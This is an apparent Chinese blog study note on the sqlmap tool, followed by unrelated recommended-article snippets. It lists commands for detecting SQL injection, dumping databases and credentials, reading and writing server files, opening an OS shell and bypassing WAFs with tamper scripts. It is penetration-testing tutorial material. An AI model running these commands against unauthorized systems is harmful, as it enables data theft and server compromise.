sqlmap学习思路笔记
step1:sqlmap检测注入点
1、sqlmap -u "http://xxx"(目标url)
2、sqlmap -r "文件路径/文件名.txt"(目标http请求)
注:第2种情况可用于POST请求、cookie注入、Request请求
若上面方法检测不出来,且最后出现”…Try to increase values for '--level'/'--risk' options if you wish to perform more tests…“字眼
可以利用下面两个方法解决
(1)探测等级:
sqlmap -u "http://xxx" --level
一共有五个等级,默认为1,级别越高检测越全面,只有level达到2才会检测HTTP Cookie,HTTP User-Agent/Referer头在level为3的时候就会检测
(2)风险等级:
sqlmap -u "http://xxx" --risk
共有四个风险等级,默认为1 ,1会测试大部分的测试语句,2会增加基于事件的测试语句,3会增加OR语句的SQL注入测试
step2:判断可注入的参数
sqlmap支持五种不同的注入模式:
基于布尔的盲注,可以根据返回页面判断条件真假的注入
基于时间的盲注,不能根据页面返回内容判断任何信息,用条件语句查看时间延迟语句是否执行(即页面返回时间是否增加)来判断。
基于报错注入,页面会返回错误信息,或者把注入的语句的结果直接返回在页面中。
联合查询注入,可以使用 union 的情况下的注入
堆查询注入,可以同时执行多条语句的执行时的注入
注入成功会出现类似如图的信息
step3:读取数据
(1)读取数据库
列出所有数据库:sqlmap -u "http://xxx" --dbs
列出当前数据库:sqlmap -u "http://xxx" --current-db
(2)读取表
sqlmap -u "http://xxx" -D 库名 --tables
(3)读取数据表中的字段名
sqlmap -u "http://xxx" -D 库名 -T 表名 --columns
(4)读取某字段的内容
sqlmap -u "http://xxx" -D 库名 -T 表名 -C 字段名(如:usename,passeord)--dump
(5)读取用户
列除所有管理用户:sqlmap -u "http://xxx" --users
当前用户:sqlmap -u "http://xxx" --current-user
判断是否为管理员用户:sqlmap -u "http://xxx" --is-dba
step4:补充参数
1、列出数据库用户密码:
sqlmap -u "http://xxx" --passwords
2、列出数据库管理员权限:
sqlmap -u "http://xxx" --privilege
3、列出表中数据库个数:
sqlmap -u "http://xxx" --count
4、从数据库中读取文件:
sqlmap -u "http://xxx" --file-read “文件名”
把文件上传到数据库中:
sqlmap -u "http://xxx" --file-write “文件路径” --file-dest ”服务器路径“
注:当数据库为MySQL、PostgreSQL、Microsoft SQL Server,并且当前用户有权限使用特定的函数。
5、http请求延时:
sqlmap -u "http://xxx" --delay
6、设定超时时间:
sqlmap -u "http://xxx" --timeout
7、运行自定义的sql语句:
sqlmap -u "http://xxx" --sql-query 或者 --sql-shell
8、运行任意操作系统命令:
sqlmap -u "http://xxx" --os-cmd 或者 --os-shell
step5:修改数据,绕过WAF等设备
有些系统过滤了比如单引号、空格、select、union、admin等关键词,于是可以使用sqlmap提供的tamper脚本,一定程度上能避开应用程序的敏感字符过滤、绕过WAF规则的阻挡,继而进行渗透攻击。
首先判断过滤了哪些关键词,再选择对应的脚本(可自行查阅网上)
sqlmap -u "http://xxx" --tamper
sqlmap学习思路笔记相关推荐
- 入门Go语言神器!超全学习资源+笔记,新手从零学习全过程资源汇总
铜灵 发自 凹非寺 量子位 出品 | 公众号 QbitAI 如果你有意进大厂,学习Go语言一定要提到你的日程上了. 美国程序员招聘网站Hired发布<2019软件工程师状态>报告中显示,基 ...
- 深度学习-最优化笔记
深度学习-最优化笔记 作者:杜客 链接:https://zhuanlan.zhihu.com/p/21360434 来源:知乎 著作权归作者所有.商业转载请联系作者获得授权,非商业转载请注明出处. 译 ...
- 学习MSCKF笔记——四元数基础
学习MSCKF笔记--四元数基础 学习MSCKF笔记--四元数基础 1. 四元数基本性质 1.1 加法 1.2 乘法 1.3 共轭 1.4 模 1.5 逆 1.6 单位四元数 1.7 指数 1.8 对 ...
- 深度学习入门笔记系列 ( 二 )——基于 tensorflow 的一些深度学习基础知识
本系列将分为 8 篇 .今天是第二篇 .主要讲讲 TensorFlow 框架的特点和此系列笔记中涉及到的入门概念 . 1.Tensor .Flow .Session .Graphs TensorFlo ...
- 深度学习课程笔记(七):模仿学习(imitation learning)
深度学习课程笔记(七):模仿学习(imitation learning) 2017.12.10 本文所涉及到的 模仿学习,则是从给定的展示中进行学习.机器在这个过程中,也和环境进行交互,但是,并没有显 ...
- 深度学习入门笔记(六):误差反向传播算法
专栏--深度学习入门笔记 推荐文章 深度学习入门笔记(一):机器学习基础 深度学习入门笔记(二):神经网络基础 深度学习入门笔记(三):感知机 深度学习入门笔记(四):神经网络 深度学习入门笔记(五) ...
- Spring5学习详细笔记
学习链接 Spring5学习详细笔记 Spring学习总结 - 工厂 第一章 :引言 1. 什么是spring 2. 设计模式 3. 工厂设计模式 3.1 什么是工厂设计模式 3.2 简单工厂的设计 ...
- Unity学习shader笔记[一百]简单焦散Caustic效果
焦散是模仿光透过水底的一个投影景象 有两个版本,改版最后效果如下 这里是简单的基于物体的焦散,基于水体的焦散思路是水面物体的shader中拿到ColorBuffer,然后用水体的屏幕空间坐标取采集Co ...
- 4. Python脚本学习实战笔记四 新闻聚合
4. Python脚本学习实战笔记四 新闻聚合 本篇名言:"人言纷杂,保持自我:工作勤奋,娱乐适度:对待朋友,不玩心术:处理事务,不躁不怒:生活讲究,量入为出:知足常乐,一生幸福!" ...
最新文章
- 利用Injection插件加快Xcode编译速度
- Jupyter notebook 的使用
- :new与:old的用法
- phpcms避免字段值重复
- 线性求所有逆元的方法
- 微信小程序前后端配合的支付代码
- P7293-[USACO21JAN]Sum of Distances P【统计,bfs】
- 微型计算机原理DL,微型计算机原理练习附解答.doc
- 游戏出海成为全球化趋势
- 酒店后台管理系统、客栈管理、入住会员、房间管理、房源、房型、订单、报表、酒店企业、短信模板、积分、打印、交接班、住宿、入住、锁房、收支流水、房间销售、消费项目、酒店管理、渠道销售、支付管理、连锁酒店
- 12306bycloud,免费开源抢票软件,无需安装,全平台可用
- firefox 各个版本都在这里
- torch.Longtensor是什么?和torch.Tensor有什么区别?
- Datawhale组队学习第五章-中值定理
- QQ空间玩吧HTML5游戏引擎使用比例分析
- mysql中日期相减_解放双手!用这3个日期函数解决入职、工龄等天数的计算
- 四川文科高考300分可以上什么专科
- Kali Linux 安装搜狗拼音输入法
- python如何安装keras和tensorflow
- 计算机病毒青少年网上公约,《全国青少年网络文明公约》学习心得